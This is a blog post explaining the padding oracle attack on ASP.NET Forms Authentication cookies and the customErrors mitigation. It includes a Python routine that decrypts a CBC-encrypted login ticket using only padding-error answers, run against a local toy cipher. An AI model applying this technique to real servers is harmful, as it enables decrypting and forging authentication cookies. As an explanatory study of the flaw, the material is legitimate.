Web Access Management: Security Hack Exposes ASP.NET Forms Authentication

ASP.NET Forms Authentication is a pretty common mechanism for web access management in .NET web applications (often combined with NTFS permissions on the content it protects). Security researchers Thai Duong and Juliano Rizzo have discovered a technique, a padding oracle attack against the CBC-mode encryption ASP.NET applies to the ticket, that lets an attacker decrypt and forge a Forms Authentication cookie without ever learning the machine key. The default cipher in current versions is AES, which is the configuration they demonstrated.

It's worth noting that the attack is 100% reliable: it is deterministic, not probabilistic, so once the padding oracle has been confirmed one can be sure the target can be exploited. Each byte of ciphertext costs at most 256 requests to recover, so it's just a matter of time, not luck.

The work around is not to switch away from AES. The flaw is not in the cipher; it is in the server telling the attacker, through a distinguishable error response, whether the decrypted data ended in valid padding, and 3DES in CBC mode leaks exactly the same thing. Microsoft's interim guidance (until a patch ships) is to enable customErrors with a single error page for every failure, so that the oracle has no distinguishable answers left to give.
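To make the mechanism concrete, here is an added, self-contained Python illustration; it is not the researchers' tool and not ASP.NET code. It runs a padding oracle attack that recovers a CBC-encrypted ticket using nothing but a yes/no answer from the server about padding. AES is replaced by a small HMAC-SHA256-based Feistel cipher so the example runs without third-party packages, which is also the point: the attack never touches the cipher internals, only the CBC structure and the server's error behaviour. The key, IV, ticket contents and the `uniform_oracle` stand-in for the customErrors mitigation are all constructed for the example.

```python
import hashlib
import hmac

BLOCK = 16

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def block_cipher(key: bytes, block: bytes, decrypt: bool = False) -> bytes:
    """4-round Feistel network with an HMAC-SHA256 round function: a keyed
    16-byte permutation standing in for AES so this runs on bare Python."""
    l, r = (block[8:], block[:8]) if decrypt else (block[:8], block[8:])
    for rnd in (reversed(range(4)) if decrypt else range(4)):
        l, r = r, _xor(l, hmac.new(key, bytes([rnd]) + r, hashlib.sha256).digest()[:8])
    return r + l if decrypt else l + r

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the distinguishable failure the server leaks
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    n = BLOCK - len(plaintext) % BLOCK
    padded, out, prev = plaintext + bytes([n]) * n, b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_cipher(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return iv + out  # IV travels in front of the ciphertext

def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    out = b""
    for i in range(BLOCK, len(data), BLOCK):
        out += _xor(block_cipher(key, data[i:i + BLOCK], decrypt=True), data[i - BLOCK:i])
    return pkcs7_unpad(out)

def make_padding_oracle(key: bytes):
    """The vulnerable server: its response reveals whether decryption ended in valid padding."""
    def oracle(data: bytes) -> bool:
        try:
            cbc_decrypt(key, data)
            return True
        except ValueError:
            return False
    return oracle

def uniform_oracle(_data: bytes) -> bool:
    """The customErrors mitigation: every failure gets the same response."""
    return False

def padding_oracle_decrypt(oracle, ciphertext: bytes):
    """Recover plaintext (padding included) from IV||C1||...||Cn with the oracle alone."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plaintext, queries = b"", 0
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_k(cur), learned one byte at a time from the right
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ pad  # make the known bytes decrypt to the pad value
            for guess in range(256):
                forged[pos] = guess
                queries += 1
                if not oracle(bytes(forged) + cur):
                    continue
                if pos == BLOCK - 1:  # a last-byte hit may be 0x02 0x02 by coincidence;
                    forged[pos - 1] ^= 1  # disturbing the byte before it exposes that
                    queries += 1
                    still_ok = oracle(bytes(forged) + cur)
                    forged[pos - 1] ^= 1
                    if not still_ok:
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                raise ValueError("oracle never distinguished a guess; attack fails")
        plaintext += _xor(inter, prev)
    return plaintext, queries

KEY = hashlib.sha256(b"constructed machineKey; never leaves the server").digest()[:16]
IV = bytes(range(BLOCK))
TICKET = b"name=alice;roles=Administrators;expires=2010-09-14T23:59"  # constructed

def recover_ticket(oracle):
    """Attacker's view: only the cookie value and the oracle, never KEY."""
    cookie = cbc_encrypt(KEY, IV, TICKET)
    try:
        raw, queries = padding_oracle_decrypt(oracle, cookie)
    except ValueError:
        return None, 0
    return pkcs7_unpad(raw), queries
```

Run with `recover_ticket(make_padding_oracle(KEY))` it returns the ticket plaintext after a few thousand oracle queries; run with `recover_ticket(uniform_oracle)` it fails outright, which is all the customErrors workaround has to achieve. Forging a ticket rather than reading one (the CBC-R step in the researchers' work) builds on the same intermediate values this code recovers.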

The method, the reason it works, and the mitigations are described here: http://visualstudiomagazine.com/articles/2010/09/14/aspnet-security-hack.aspx

More coverage here: http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310
